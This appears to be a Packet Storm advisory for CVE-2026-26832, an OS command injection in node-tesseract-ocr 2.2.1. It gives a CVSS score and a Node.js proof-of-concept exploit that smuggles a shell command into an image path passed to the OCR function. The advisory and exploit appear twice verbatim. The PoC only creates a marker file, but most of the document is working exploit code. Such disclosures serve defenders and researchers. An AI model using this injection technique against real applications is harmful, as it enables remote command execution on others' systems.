9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
In node-tesseract-ocr version 2.2.1, a security vulnerability allows OS command injection when attacker-controlled image paths are passed to the OCR function...
Basic Information
ID
PACKETSTORM:219822
Published
Apr 27, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : node-tesseract-ocr 2.2.1 OS Command Injection via Unsanitized Image Path Leading to RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.npmjs.com/package/node-tesseract-ocr |
==================================================================================================================================
[+] Summary : In node-tesseract-ocr version 2.2.1, a security vulnerability allows OS command injection when attacker-controlled image paths are passed to the OCR function.
[+] POC : exploit-basic.js
const tesseract = require('node-tesseract-ocr');
const maliciousImagePath = 'test.jpg"; touch /tmp/pwned.txt; echo "x';
const config = {
lang: 'eng',
oem: 1,
psm: 3,
};
console.log("[+] CVE-2026-26832 - node-tesseract-ocr OS Command Injection Exploit");
console.log("[+] Malicious image path:", maliciousImagePath);
console.log("[+] Attempting to recognize text...");
tesseract.recognize(maliciousImagePath, config)
.then(text => {
console.log("[+] OCR completed (injection might still have worked)");
console.log("Extracted text:", text);
})
.catch(error => {
console.log("[!] OCR failed (but command may have executed before the error)");
console.log("Error:", error.message);
})
.finally(() => {
console.log("[*] Check if command executed: ls -la /tmp/pwned.txt");
console.log("[*] If the file exists, the exploit was successful!");
});
node-tesseract-ocr 2.2.1
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : node-tesseract-ocr 2.2.1 OS Command Injection via Unsanitized Image Path Leading to RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.npmjs.com/package/node-tesseract-ocr |
==================================================================================================================================
[+] Summary : In node-tesseract-ocr version 2.2.1, a security vulnerability allows OS command injection when attacker-controlled image paths are passed to the OCR function.
[+] POC : exploit-basic.js
const tesseract = require('node-tesseract-ocr');
const maliciousImagePath = 'test.jpg"; touch /tmp/pwned.txt; echo "x';
const config = {
lang: 'eng',
oem: 1,
psm: 3,
};
console.log("[+] CVE-2026-26832 - node-tesseract-ocr OS Command Injection Exploit");
console.log("[+] Malicious image path:", maliciousImagePath);
console.log("[+] Attempting to recognize text...");
tesseract.recognize(maliciousImagePath, config)
.then(text => {
console.log("[+] OCR completed (injection might still have worked)");
console.log("Extracted text:", text);
})
.catch(error => {
console.log("[!] OCR failed (but command may have executed before the error)");
console.log("Error:", error.message);
})
.finally(() => {
console.log("[*] Check if command executed: ls -la /tmp/pwned.txt");
console.log("[*] If the file exists, the exploit was successful!");
});
node-tesseract-ocr 2.2.1
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================